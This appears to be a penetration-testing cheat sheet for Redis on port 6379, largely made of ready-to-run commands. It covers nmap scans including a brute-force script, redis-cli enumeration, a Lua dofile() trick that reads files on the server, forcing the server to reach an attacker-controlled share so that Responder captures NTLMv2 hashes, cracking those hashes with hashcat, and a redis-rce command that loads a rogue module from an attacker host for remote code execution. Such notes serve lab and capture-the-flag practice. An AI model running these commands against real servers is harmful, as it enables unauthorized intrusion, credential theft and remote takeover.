Skip to content

6379 - Pentesting redis

nmap

sudo nmap -p 6379 -A $IP

sudo nmap -sV -p 6379 --script=redis-info.nse $IP
sudo nmap -sV -p 6379 --script=redis-brute.nse $IP

enumeration

connect 

# sudo apt-get install redis-tools
redis-cli -h $IP
redis-cli -h $IP --pass password1234


redis> info
redis> INFO
redis> client list
redis> CONFIG GET *

exploits

2.8.2402

Redis can execute Lua scripts (in a sandbox, more on that later) via the “EVAL” command. The sandbox allows the dofile() command (WHY???). It can be used to enumerate files and directories. No specific privilege is needed by Redis… If the Lua script is syntaxically invalid or attempts to set global variables, the error messages will leak some content of the target file.

  • https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html
  • https://korbinian-spielvogel.de/posts/vulnnet-active-writeup/

access file on server

redis-cli -h $IP
> eval "dofile('C:\\\\Users\\\\enterprise-security\\\\Desktop\\\\user.txt')" 0

obtaining the NTLMv2 Hash / User’s password

Now that we know that we can access files on the server, we can try to do some more advanced stuff. We could try to access a remote share. This would leak the NTLM hash of the user as he/she tries to authenticate himself/herself. If this remote share is on our machine, we could attempt to log the access and thus get access to the hash.

For that, we first set up a listener using Impacket's Responder.py.

sudo responder -I tun0

Then, we use the redis eval technique to access the exposed share.

redis-cli -h $IP eval "dofile('//10.8.6.103/test')" 0

Crack NTLMv2 hash 

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

4.X / 5.X

  • https://github.com/Ridter/redis-rce
  • https://github.com/n0b0dyCN/RedisModules-ExecuteCommand 
    cd /RedisModules-ExecuteCommand
make

cd /redis-rce
python3 redis-rce.py -r $IP -p 6379 -L 192.168.49.99 -P 6379 -f ../RedisModules-ExecuteCommand/module.so